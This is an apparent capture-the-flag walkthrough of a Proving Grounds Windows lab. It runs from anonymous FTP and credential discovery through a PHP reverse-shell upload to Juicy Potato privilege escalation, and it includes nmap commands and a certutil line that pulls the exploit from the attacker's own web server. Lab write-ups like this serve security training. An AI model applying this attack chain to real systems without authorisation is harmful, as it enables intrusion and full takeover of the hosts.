Difficulty – Intermediate
Platform – Proving Grounds Practice
Operating System – Windows
Focus Areas
- FTP Enumeration
- Credential Discovery
- Web Shell Upload
- Windows Enumeration
- Juicy Potato Exploitation
- Privilege Escalation
In this writeup, I leverage anonymous FTP access to uncover sensitive information and valid credentials that lead to a protected web application. By uploading a PHP reverse shell, I gain remote code execution and establish an initial foothold on the target. After performing local enumeration, I exploit Juicy Potato to abuse token impersonation privileges and escalate to NT AUTHORITYSYSTEM.
Recon & Enumeration
Enumeration plays a very significant role in pen testing. The more properly you enumerate the more it will be easy to get a foothold on the target.
First, we will check whether target is reachable or not with ping command:
ping Target_IP

With ping command output we found that the target is reachable.
Now let’s move ahead and run the port scan for which we will be using Nmap a popular tool for port scanning and it will provide details of the various ports which are in Open state. The command for that will be:
nmap -sC -sV -O -oA nmap/initial 192.168.190.46
nmap -sC -sV -O -p- -oA nmap/full -T4 192.168.190.46



I discovered these ports are open:
- 21/tcp FTP service running zFTPServer 6.0 with anonymous access enabled
- 242/tcp HTTP service running Apache httpd 2.2.21 (Win32) and PHP 5.3.8 (Basic Authentication enforced)
- 3145/tcp zFTPServer administration service exposed
- 3389/tcp Microsoft Remote Desktop Services (RDP)
- OS: Microsoft Windows Server 2008 R2 Enterprise
Then I went ahead and checked the anonymous ftp and I found accounts directory and inside the accounts directory I found admin account details:

Then we have downloaded all the files using mget * :


Upon inspecting the files we discovered credentials which must be for the port 242 running http service:


The credentials worked:

Exploitation
Then moving ahead using revshell a reverse shell is generated:

Using ftp the shell was uploaded to the target:


Then a netcat listener was started and we have obtained the foothold:



local.txt flag was discovered.
Privilege Escalation
Now it was a time for escalating the privileges.
Using whoami /priv it was discovered that SeImpersonatePrivilege was enabled. Also the system info revealed that the target is running with Windows Server 2008 Standard, so I used the Juicy Potato for priv esc:
https://github.com/ivanitlearning/Juicy-Potato-x86/releases

I hosted it using python server:

I used the Windows CertUtil utility to download the file Juicy Potato from a my web server using the following command and then executed the Juicy Potato exploit:
certutil -urlcache -split -f http://192.168.45.156/Juicy.Potato.x86.exe

I added the arguments without -c CLSID parameter so the Juicy Potato will use its default CLSID.
CLSID (Class Identifier) is a unique 128-bit GUID used by Microsoft’s COM (Component Object Model) architecture to identify a specific COM object or service. Also I selected a port 1250 and there is no specific reason for that and used -p to execute the program with elevated privileges:
The defaukt CLSID didn’t worked:

I used the following link to look for CLSIDs:
https://github.com/ohpe/juicy-potato/tree/master/CLSID/?source=post_page—–96e74b36375a—————————————
The target appears to be running Windows Server 2008 R2 Enterprise so used CLSID related to that one and it worked.
So I used it as a reverse shell using nc binary:


The above image shows the proof.txt file.
Key Takeaways
- Anonymous services often expose more information than intended and can become a valuable starting point for an attack chain.
- Credentials may be scattered across configuration files, backups, and authentication-related artifacts, making comprehensive enumeration critical.
- Weak or reused passwords can quickly transform information disclosure into full application compromise.
- File upload functionality should be strictly controlled and validated to prevent arbitrary code execution.
- Accurate operating system identification helps narrow down viable privilege escalation techniques.
- The presence of SeImpersonatePrivilege can significantly increase the impact of a compromised service account.
- Modern attacks frequently rely on chaining multiple low-to-medium severity issues rather than a single critical vulnerability.
- Methodical enumeration at every stage often reveals the path to compromise more effectively than aggressive exploitation attempts.
If you enjoyed this post, share it with your friends and colleagues!